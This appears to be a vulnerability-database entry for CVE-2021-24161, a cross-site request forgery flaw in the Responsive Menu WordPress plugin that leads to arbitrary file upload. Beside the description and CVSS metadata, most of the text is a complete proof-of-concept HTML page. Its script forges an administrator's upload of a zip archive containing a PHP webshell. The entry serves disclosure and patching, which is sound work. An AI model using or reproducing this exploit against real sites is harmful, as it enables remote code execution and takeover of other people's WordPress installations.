Description
In the Reponsive Menu (free and Pro) WordPress plugins before 4.0.4, attackers could craft a request and trick an administrator into uploading a zip archive containing malicious PHP files. The attacker could then access those files to achieve remote code execution and further infect the targeted site.
Affected Software
Related
{"id": "CVE-2021-24161", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-24161", "description": "In the Reponsive Menu (free and Pro) WordPress plugins before 4.0.4, attackers could craft a request and trick an administrator into uploading a zip archive containing malicious PHP files. The attacker could then access those files to achieve remote code execution and further infect the targeted site.", "published": "2021-04-05T19:15:00", "modified": "2021-04-08T19:26:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.8}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24161", "reporter": "contact@wpscan.com", "references": ["https://wpscan.com/vulnerability/efca27e0-bdb6-4497-8330-081f909d6933", "https://www.wordfence.com/blog/2021/02/multiple-vulnerabilities-patched-in-responsive-menu-plugin/"], "cvelist": ["CVE-2021-24161"], "immutableFields": [], "lastseen": "2022-03-23T14:48:17", "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:EFCA27E0-BDB6-4497-8330-081F909D6933"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:EFCA27E0-BDB6-4497-8330-081F909D6933"]}], "rev": 4}, "score": {"value": 5.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:EFCA27E0-BDB6-4497-8330-081F909D6933"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:EFCA27E0-BDB6-4497-8330-081F909D6933"]}]}, "exploitation": null, "vulnersScore": 5.3}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-352"], "affectedSoftware": [{"cpeName": "expresstech:responsive_menu", "version": "4.0.4", "operator": "lt", "name": "expresstech responsive menu"}, {"cpeName": "expresstech:responsive_menu", "version": "4.0.4", "operator": "lt", "name": "expresstech responsive menu"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:expresstech:responsive_menu:4.0.4:*:*:*:free:wordpress:*:*", "versionEndExcluding": "4.0.4", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:expresstech:responsive_menu:4.0.4:*:*:*:pro:wordpress:*:*", "versionEndExcluding": "4.0.4", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://wpscan.com/vulnerability/efca27e0-bdb6-4497-8330-081f909d6933", "name": "https://wpscan.com/vulnerability/efca27e0-bdb6-4497-8330-081f909d6933", "refsource": "CONFIRM", "tags": ["Third Party Advisory"]}, {"url": "https://www.wordfence.com/blog/2021/02/multiple-vulnerabilities-patched-in-responsive-menu-plugin/", "name": "https://www.wordfence.com/blog/2021/02/multiple-vulnerabilities-patched-in-responsive-menu-plugin/", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}]}
{"wpvulndb": [{"lastseen": "2021-02-24T16:27:03", "bulletinFamily": "software", "cvelist": ["CVE-2021-24161"], "description": "\"Attackers could craft a request and trick an administrator into uploading a zip archive containing malicious PHP files. The attacker could then access those files to achieve remote code execution and further infect the targeted site.\"\n\n### PoC\n", "modified": "2021-02-19T06:00:56", "id": "WPVDB-ID:EFCA27E0-BDB6-4497-8330-081F909D6933", "href": "https://wpscan.com/vulnerability/efca27e0-bdb6-4497-8330-081f909d6933", "published": "2021-02-10T00:00:00", "type": "wpvulndb", "title": "Responsive Menu < 4.0.4 - CSRF to Arbitrary File Upload ", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "wpexploit": [{"lastseen": "2021-02-24T16:27:03", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-24161"], "description": "\"Attackers could craft a request and trick an administrator into uploading a zip archive containing malicious PHP files. The attacker could then access those files to achieve remote code execution and further infect the targeted site.\"\n", "modified": "2021-02-19T06:00:56", "published": "2021-02-10T00:00:00", "id": "WPEX-ID:EFCA27E0-BDB6-4497-8330-081F909D6933", "href": "", "type": "wpexploit", "title": "Responsive Menu < 4.0.4 - CSRF to Arbitrary File Upload ", "sourceData": "<html>\r\n <body>\r\n <script>\r\n function submitRequest()\r\n {\r\n var xhr = new XMLHttpRequest();\r\n xhr.open(\"POST\", \"URL/admin.php?page=responsive-menu\", true);\r\n xhr.setRequestHeader(\"Content-Type\", \"multipart\\/form-data; boundary=----WebKitFormBoundarygnyRsNOKdwWN8fJj\");\r\n xhr.setRequestHeader(\"Accept\", \"*\");\r\n xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.9\");\r\n xhr.withCredentials = true;\r\n var body = \"\\r\\n\" + \r\n \"------WebKitFormBoundarygnyRsNOKdwWN8fJj\\r\\n\" + \r\n \"Content-Disposition: form-data; name=\\\"responsive-menu-import-theme-file\\\"; filename=\\\"webshell.zip\\\"\\r\\n\" + \r\n \"Content-Type: application/zip\\r\\n\" + \r\n \"\\r\\n\" + \r\n \"PK\\x03\\x04\\x14\\x00\\x00\\x00\\x00\\x00jP\\x91Q\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\t\\x00 \\x00webshell/UT\\r\\x00\\x079s\\xdb_:s\\xdb_@s\\xdb_ux\\x0b\\x00\\x01\\x04\\xf5\\x01\\x00\\x00\\x04\\x14\\x00\\x00\\x00PK\\x03\\x04\\x14\\x00\\x08\\x00\\x08\\x00+f\\x90Q\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc8\\x06\\x00\\x00\\x17\\x00 \\x00webshell/something.jsonUT\\r\\x00\\x07\\xa3H\\xda_0s\\xdb_9s\\xdb_ux\\x0b\\x00\\x01\\x04\\xf5\\x01\\x00\\x00\\x04\\x14\\x00\\x00\\x00\\xbdU[O\\xdb0\\x14~\\xef\\xaf8d\\x88R\\t7\\x80\\x86\\x86J\\x12\\xb4A\\xd0\\xf6\\xb0\\x95\\xd1\\xb2\\x8b\\xd0T9\\xf1ica\\xc7\\x99\\xe3\\x14\\xba\\x89\\xff\\x3e;MK\\xca\\x98x[\\xd4*\\xb6\\xcf\\xfd\\xfb|N\\x82\\xd3\\\"+:|\\n\" + \r\n \"\\xbb[(\\x0b\\xb3\\xd8\\xdd\\x9e\\\\\\x0eG\\xe3\\x9bn*Y\\xf7G\\xaf\\x07\\xbf;`\\x9fm\\xbb\\x85\\x10\\xca\\x0c\\x85\\x98\\xe0=\\xa6O\\xf4N:\\x0f\\x9d\\xd3\\xa8\\x13l\\x9d\\x0f\\xcf\\xc6\\xdf/c\\xc8\\x8c\\x14v\\xdf\\xbc\\xb6\\x08\\x81w\\x0bx\\xab\\xcd\\xa2\\x92\\xb0\\x9b\\x19S\\x94\\x03\\xdf\\x9fq\\x93UI?U\\xd2\\xa7NT\\xc9\\x1e\\x10\\xe2\\xcc\\x90\\xb2\\xa8SG\\x0e$\\x1a\\n\" + \r\n \"iFu\\x89&\\xf4*3%\\xc7\\xde\\x86\\xccy#\\xf8\\xb3\\xe2\\xf3\\xd0\\xfbF\\xae\\xdf\\x923%\\x0bjx\\\"\\xd0\\x83T\\xe5\\x06sk\\xf8!\\x0e\\x91\\xcdp\\xd34\\xa7\\x12Co\\xce\\xf1\\xaeP\\xda\\xb4\\xb4\\xef83Y\\xc8p\\xceS$\\xf5f\\x0fx\\xce\\r\\xa7\\x82\\x94)\\x15\\x18\\x1e\\xac=\\t\\x9e\\xdf\\x82F\\x11z\\xa5Y\\x08\\xb4\\x18\\xa1ue\\x16\\x85um\\xf0\\xde\\xf8iYz\\x90i\\x9c\\x86\\x9e\\xef\\'J\\x99\\xf2\\x8e\\x9a4\\xab\\xeb~\\xedO\\x055b\\xb1\\x3c7\\x9a\\x16}\\xc9\\xf3\\xbe3Y\\xf97\\xdc\\x08\\x8c\\xbeb\\x02#\\x07\\x7f\\xe0/\\x0f\\x1ai\\x1d3\\xaa\\xd7\\xee\\xc9\\x0e\\x1b\\xc6VO\\xaa\\x84\\xd2\\x03\\xd0\\xb3\\x84\\xee\\xee\\xef\\xc1\\xf2\\xd7\\x7fsd)[\\xa9\\x3ct\\xd6\\xcbB\\xe3\\x13\\xfb\\x822\\xc6\\xf3\\xd9\\x00\\x0e\\x8e\\x8a\\xfb\\x93\\r\\x11\\xb9\\xc3\\xe4\\x96\\x1b\\x92(\\xcdP\\x13M\\x19\\xaf\\xca\\x01\\xfc\\xad\\'\\xd5\\xaf\\x17\\x95^\\x94\\xd3\\xf4v\\xa6U\\x953\\xd2\\x94\\xf4*\\x3e\\xbb\\xd8\\xbf8x\\xb6\\x8e\\xbec\\x92\\xf2\\x1c\\xf5\\x93rj.\\x07p|\\xb4\\xdf\\x0e\\xf0\\xb0\\xc4\\xd2o\\xc0\\xec\\x04~s\\x03\\x83D\\xb1\\x85{3\\x3e\\x87T\\xd0\\xb2\\x0c\\xbd\\xb5\\xeb5C-a\\x91\\x90C\\x90\\x86\\xbc\\x06iW\\xde#1Av\\x10]\\xbe\\xbf\\\\qhw-\\xd1a\\x04\\xb1m\\xaa\\xca \\xd8\\xbb\\xae\\xa4\\xa49\\xb3\\xe9\\xd8\\xf3&1\\x1ba\\x15l\\xaa\\xb4\\x04{{3\\xc5B\\xcf\\xf5`;H+\\x13\\xa7G\\x1cbEK\\xa1V\\x124A\\x01Vnk\\x91\\xcc\\x8b\\xec\\x1d\\xd2*\\x9fEg\\xcb\\xc0\\x0e\\x86z\\x1f\\xf8\\xb5\\xe6\\x13k\\x9e\\x17\\x95i]oo#\\xa0\\x03G+\\xe15\\xad\\xe5\\xfc\\x03g\\xcdbNEe\\x0f\\x83\\xd3\\xb0\\x9e\\x0fe\\x81\\xa9m\\xa8\\xba\\xb77\\xe7\\xc9\\x1e\\xc4\\x9f\\xc6\\x93\\xcf\\xd7\\xc3q\\x3c\\xda\\x83\\xee\\xf5\\xf8\\x82\\x1cw{p\\x1ay\\xb6\\xd1l\\xa7kd\\xad\\xa2\\x97\\xe8\\xac\\xb7Ie\\x8c\\xca\\x9b\\x0c\\xcb*\\x91\\xfc1\\xc7\\xc4\\xe4`\\xff\\xa4\\xd0\\\\R\\xbd\\xf0\\xa2\\x06\\xf6\\xc0_Z\\xad\\xf0v\\xb5\\xac\\x00w\\x13\\x12\\xdc\\x84tC\\xb07\\xb0Y\\x3c\\x8b\\xf7?\\x99_S\\x3c\\xac\\x8c\\x83\\xee\\x91\\xd7\\xe7\\xb2\\xb7\\x1dh\\x07\\xe0\\xb3\\x08\\xd9\\xf0\\xff\\x04\\xa6\\xe5\\xaf\\xf6\\xf0\\x989\\x8a\\x12\\xeb\\xf9^\\xcf\\xf0\\x9d\\x1d\\xd8\\x9e\\x8c\\xe2\\xab/\\xf1\\xd5M\\xf7*\\xfe|\\x1d\\x8f\\xc6\\x93\\x8f\\xf1\\xf8\\xfd\\xf0\\xbc\\xfb\\x03\\xc2\\x10\\xba\\x8e\\x86\\xee\\x7f)3(%\\x15\\\"\\xfa\\xa4,\\xa9e%L\\xdf\\xde\\xbc\\xfa\\xe4\\xef\\x1ar\\xc6\\xa7\\'.\\xa5U+X\\xc2\\x9a\\xce\\xf4\\xebo\\xcc\\x1fPK\\x07\\x08\\xeby\\xe1\\xae\\x16\\x03\\x00\\x00\\xc8\\x06\\x00\\x00PK\\x03\\x04\\x14\\x00\\x08\\x00\\x08\\x00+f\\x90Q\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc8\\x06\\x00\\x00\\x15\\x00 \\x00webshell/webshell.phpUT\\r\\x00\\x07\\xa3H\\xda_\\x89r\\xdb_\\xa3H\\xda_ux\\x0b\\x00\\x01\\x04\\xf5\\x01\\x00\\x00\\x04\\x14\\x00\\x00\\x00\\xbdU[O\\xdb0\\x14~\\xef\\xaf8d\\x88R\\t7\\x80\\x86\\x86J\\x12\\xb4A\\xd0\\xf6\\xb0\\x95\\xd1\\xb2\\x8b\\xd0T9\\xf1ica\\xc7\\x99\\xe3\\x14\\xba\\x89\\xff\\x3e;MK\\xca\\x98x[\\xd4*\\xb6\\xcf\\xfd\\xfb|N\\x82\\xd3\\\"+:|\\n\" + \r\n \"\\xbb[(\\x0b\\xb3\\xd8\\xdd\\x9e\\\\\\x0eG\\xe3\\x9bn*Y\\xf7G\\xaf\\x07\\xbf;`\\x9fm\\xbb\\x85\\x10\\xca\\x0c\\x85\\x98\\xe0=\\xa6O\\xf4N:\\x0f\\x9d\\xd3\\xa8\\x13l\\x9d\\x0f\\xcf\\xc6\\xdf/c\\xc8\\x8c\\x14v\\xdf\\xbc\\xb6\\x08\\x81w\\x0bx\\xab\\xcd\\xa2\\x92\\xb0\\x9b\\x19S\\x94\\x03\\xdf\\x9fq\\x93UI?U\\xd2\\xa7NT\\xc9\\x1e\\x10\\xe2\\xcc\\x90\\xb2\\xa8SG\\x0e$\\x1a\\n\" + \r\n \"iFu\\x89&\\xf4*3%\\xc7\\xde\\x86\\xccy#\\xf8\\xb3\\xe2\\xf3\\xd0\\xfbF\\xae\\xdf\\x923%\\x0bjx\\\"\\xd0\\x83T\\xe5\\x06sk\\xf8!\\x0e\\x91\\xcdp\\xd34\\xa7\\x12Co\\xce\\xf1\\xaeP\\xda\\xb4\\xb4\\xef83Y\\xc8p\\xceS$\\xf5f\\x0fx\\xce\\r\\xa7\\x82\\x94)\\x15\\x18\\x1e\\xac=\\t\\x9e\\xdf\\x82F\\x11z\\xa5Y\\x08\\xb4\\x18\\xa1ue\\x16\\x85um\\xf0\\xde\\xf8iYz\\x90i\\x9c\\x86\\x9e\\xef\\'J\\x99\\xf2\\x8e\\x9a4\\xab\\xeb~\\xedO\\x055b\\xb1\\x3c7\\x9a\\x16}\\xc9\\xf3\\xbe3Y\\xf97\\xdc\\x08\\x8c\\xbeb\\x02#\\x07\\x7f\\xe0/\\x0f\\x1ai\\x1d3\\xaa\\xd7\\xee\\xc9\\x0e\\x1b\\xc6VO\\xaa\\x84\\xd2\\x03\\xd0\\xb3\\x84\\xee\\xee\\xef\\xc1\\xf2\\xd7\\x7fsd)[\\xa9\\x3ct\\xd6\\xcbB\\xe3\\x13\\xfb\\x822\\xc6\\xf3\\xd9\\x00\\x0e\\x8e\\x8a\\xfb\\x93\\r\\x11\\xb9\\xc3\\xe4\\x96\\x1b\\x92(\\xcdP\\x13M\\x19\\xaf\\xca\\x01\\xfc\\xad\\'\\xd5\\xaf\\x17\\x95^\\x94\\xd3\\xf4v\\xa6U\\x953\\xd2\\x94\\xf4*\\x3e\\xbb\\xd8\\xbf8x\\xb6\\x8e\\xbec\\x92\\xf2\\x1c\\xf5\\x93rj.\\x07p|\\xb4\\xdf\\x0e\\xf0\\xb0\\xc4\\xd2o\\xc0\\xec\\x04~s\\x03\\x83D\\xb1\\x85{3\\x3e\\x87T\\xd0\\xb2\\x0c\\xbd\\xb5\\xeb5C-a\\x91\\x90C\\x90\\x86\\xbc\\x06iW\\xde#1Av\\x10]\\xbe\\xbf\\\\qhw-\\xd1a\\x04\\xb1m\\xaa\\xca \\xd8\\xbb\\xae\\xa4\\xa49\\xb3\\xe9\\xd8\\xf3&1\\x1ba\\x15l\\xaa\\xb4\\x04{{3\\xc5B\\xcf\\xf5`;H+\\x13\\xa7G\\x1cbEK\\xa1V\\x124A\\x01Vnk\\x91\\xcc\\x8b\\xec\\x1d\\xd2*\\x9fEg\\xcb\\xc0\\x0e\\x86z\\x1f\\xf8\\xb5\\xe6\\x13k\\x9e\\x17\\x95i]oo#\\xa0\\x03G+\\xe15\\xad\\xe5\\xfc\\x03g\\xcdbNEe\\x0f\\x83\\xd3\\xb0\\x9e\\x0fe\\x81\\xa9m\\xa8\\xba\\xb77\\xe7\\xc9\\x1e\\xc4\\x9f\\xc6\\x93\\xcf\\xd7\\xc3q\\x3c\\xda\\x83\\xee\\xf5\\xf8\\x82\\x1cw{p\\x1ay\\xb6\\xd1l\\xa7kd\\xad\\xa2\\x97\\xe8\\xac\\xb7Ie\\x8c\\xca\\x9b\\x0c\\xcb*\\x91\\xfc1\\xc7\\xc4\\xe4`\\xff\\xa4\\xd0\\\\R\\xbd\\xf0\\xa2\\x06\\xf6\\xc0_Z\\xad\\xf0v\\xb5\\xac\\x00w\\x13\\x12\\xdc\\x84tC\\xb07\\xb0Y\\x3c\\x8b\\xf7?\\x99_S\\x3c\\xac\\x8c\\x83\\xee\\x91\\xd7\\xe7\\xb2\\xb7\\x1dh\\x07\\xe0\\xb3\\x08\\xd9\\xf0\\xff\\x04\\xa6\\xe5\\xaf\\xf6\\xf0\\x989\\x8a\\x12\\xeb\\xf9^\\xcf\\xf0\\x9d\\x1d\\xd8\\x9e\\x8c\\xe2\\xab/\\xf1\\xd5M\\xf7*\\xfe|\\x1d\\x8f\\xc6\\x93\\x8f\\xf1\\xf8\\xfd\\xf0\\xbc\\xfb\\x03\\xc2\\x10\\xba\\x8e\\x86\\xee\\x7f)3(%\\x15\\\"\\xfa\\xa4,\\xa9e%L\\xdf\\xde\\xbc\\xfa\\xe4\\xef\\x1ar\\xc6\\xa7\\'.\\xa5U+X\\xc2\\x9a\\xce\\xf4\\xebo\\xcc\\x1fPK\\x07\\x08\\xeby\\xe1\\xae\\x16\\x03\\x00\\x00\\xc8\\x06\\x00\\x00PK\\x03\\x04\\x14\\x00\\x08\\x00\\x08\\x00kP\\x91Q\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x18\\x00\\x00\\x12\\x00 \\x00webshell/.DS_StoreUT\\r\\x00\\x07:s\\xdb_Cs\\xdb_:s\\xdb_ux\\x0b\\x00\\x01\\x04\\xf5\\x01\\x00\\x00\\x04\\x14\\x00\\x00\\x00\\xed\\x98\\xb1N\\xc30\\x14E\\xef\\x0b\\x19\\\"QU\\x16\\x13\\xa3G\\xa6J\\x8c\\xdd\\xac\\xaa\\x0c\\xcc\\xfd\\x01\\x94\\x16QP\\xdaTj\\x11k6\\xbe\\x85\\xaf\\xa4N\\xde\\x15r\\xd5t`*\\xa2\\xefD\\xd6\\x89\\x12_\\xc7Y\\x1c\\xbf\\x00\\x90\\xc9\\xfb\\xe2\\x1ep\\x00\\n\" + \r\n \"\\xa8\\xf1\\x89^\\n\" + \r\n \"\\xb6#\\xb2\\xc4\\xd2\\x8d\\xb1\\xc3\\x12\\xafX\\xe3\\x05\\xa3\\xfe\\xb1z\\xc7\\x18b\\x8b\\x1a+\\x3c\\x1f\\xe4\\xdf\\xba\\xab\\xeb\\xc7\\xaa\\x9e\\x97U]\\xea$\\xe5&z\\xfc\\xdd\\xd1\\xe5\\x07\\xf8\\x88\\xb92\\xf6]FW\\xf1\\x18a\\x13\\xcf7\\x879|\\xc5v\\x97\\xe4\\x0c\\xc30\\x0c\\xe3R\\x11Uq}\\xdei\\x18\\x86\\xf1\\x07i\\xd7\\x07O\\x07\\xbaQ\\x0b\\xefgt\\x9ed\\x1c\\xed\\xe9@7ja\\xbf\\x8c\\xce\\xe9\\x82v\\xb4\\xa7\\x03\\xdd\\xa8\\xb9h\\t\\x8b\\x0f\\xe1\\x93\\x85\\x15\\x8a8\\xda\\xd3\\xe1W\\xafl\\x18\\x17\\xc3\\x95\\xca\\xb5\\xdf\\xff\\x07\\x9c\\xac\\xff\\r\\xc3\\xf8\\xc7H\\x3e\\x9dM\\'\\xf8)\\x08\\x8eh\\xbf\\xb5\\x3e\\xb6\\xa74tb\\x13\\x90\\xe9\\xcf\\xc2\\xdb\\xa4\\x9f\\xa7\\x03\\xdd\\xa8m#`\\x18\\xe7b\\x0fPK\\x07\\x08\\x1c8o\\x96\\x03\\x01\\x00\\x00\\x04\\x18\\x00\\x00PK\\x03\\x04\\x14\\x00\\x08\\x00\\x08\\x00kP\\x91Q\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00x\\x00\\x00\\x00\\x1d\\x00 \\x00__MACOSX/webshell/._.DS_StoreUT\\r\\x00\\x07:s\\xdb_Cs\\xdb_Ws\\xdb_ux\\x0b\\x00\\x01\\x04\\xf5\\x01\\x00\\x00\\x04\\x14\\x00\\x00\\x00c`\\x15cg`b`\\xf0MLV\\xf0\\x0fV\\x88P\\x80\\x02\\x90\\x18\\x03\\'\\x10\\x1b\\x01\\xb1\\x1b\\x10\\x83\\xf8\\x15@\\xcc\\x00S\\xe1 \\xc0\\x80\\x038\\x86\\x84\\x04A\\x99\\x150]\\xe8\\x00\\x00PK\\x07\\x08\\x0b\\x88\\xc085\\x00\\x00\\x00x\\x00\\x00\\x00PK\\x01\\x02\\x14\\x03\\x14\\x00\\x00\\x00\\x00\\x00jP\\x91Q\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\t\\x00 \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfdA\\x00\\x00\\x00\\x00webshell/UT\\r\\x00\\x079s\\xdb_:s\\xdb_@s\\xdb_ux\\x0b\\x00\\x01\\x04\\xf5\\x01\\x00\\x00\\x04\\x14\\x00\\x00\\x00PK\\x01\\x02\\x14\\x03\\x14\\x00\\x08\\x00\\x08\\x00+f\\x90Q\\xeby\\xe1\\xae\\x16\\x03\\x00\\x00\\xc8\\x06\\x00\\x00\\x17\\x00 \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfd\\x81G\\x00\\x00\\x00webshell/something.jsonUT\\r\\x00\\x07\\xa3H\\xda_0s\\xdb_9s\\xdb_ux\\x0b\\x00\\x01\\x04\\xf5\\x01\\x00\\x00\\x04\\x14\\x00\\x00\\x00PK\\x01\\x02\\x14\\x03\\x14\\x00\\x08\\x00\\x08\\x00+f\\x90Q\\xeby\\xe1\\xae\\x16\\x03\\x00\\x00\\xc8\\x06\\x00\\x00\\x15\\x00 \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfd\\x81\\xc2\\x03\\x00\\x00webshell/webshell.phpUT\\r\\x00\\x07\\xa3H\\xda_\\x89r\\xdb_\\xa3H\\xda_ux\\x0b\\x00\\x01\\x04\\xf5\\x01\\x00\\x00\\x04\\x14\\x00\\x00\\x00PK\\x01\\x02\\x14\\x03\\x14\\x00\\x08\\x00\\x08\\x00kP\\x91Q\\x1c8o\\x96\\x03\\x01\\x00\\x00\\x04\\x18\\x00\\x00\\x12\\x00 \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa4\\x81;\\x07\\x00\\x00webshell/.DS_StoreUT\\r\\x00\\x07:s\\xdb_Cs\\xdb_:s\\xdb_ux\\x0b\\x00\\x01\\x04\\xf5\\x01\\x00\\x00\\x04\\x14\\x00\\x00\\x00PK\\x01\\x02\\x14\\x03\\x14\\x00\\x08\\x00\\x08\\x00kP\\x91Q\\x0b\\x88\\xc085\\x00\\x00\\x00x\\x00\\x00\\x00\\x1d\\x00 \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa4\\x81\\x9e\\x08\\x00\\x00__MACOSX/webshell/._.DS_StoreUT\\r\\x00\\x07:s\\xdb_Cs\\xdb_Ws\\xdb_ux\\x0b\\x00\\x01\\x04\\xf5\\x01\\x00\\x00\\x04\\x14\\x00\\x00\\x00PK\\x05\\x06\\x00\\x00\\x00\\x00\\x05\\x00\\x05\\x00\\xea\\x01\\x00\\x00\\x3e\\t\\x00\\x00\\x00\\x00\\r\\n\" + \r\n \"------WebKitFormBoundarygnyRsNOKdwWN8fJj\\r\\n\" + \r\n \"Content-Disposition: form-data; name=\\\"responsive-menu-import-theme\\\"\\r\\n\" + \r\n \"\\r\\n\" + \r\n \"\\r\\n\" + \r\n \"------WebKitFormBoundarygnyRsNOKdwWN8fJj\\r\\n\" + \r\n \"Content-Disposition: form-data; name=\\\"responsive-menu-current-page\\\"\\r\\n\" + \r\n \"\\r\\n\" + \r\n \"themes\\r\\n\" + \r\n \"------WebKitFormBoundarygnyRsNOKdwWN8fJj--\\r\\n\";\r\n var aBody = new Uint8Array(body.length);\r\n for (var i = 0; i < aBody.length; i++)\r\n aBody[i] = body.charCodeAt(i); \r\n xhr.send(new Blob([aBody]));\r\n }\r\n </script>\r\n <form action=\"#\">\r\n <input type=\"button\" value=\"Submit request\" onclick=\"submitRequest();\" />\r\n </form>\r\n </body>\r\n</html>", "cvss": {"score": 0.0, "vector": "NONE"}}]}
CVE-2021-24161
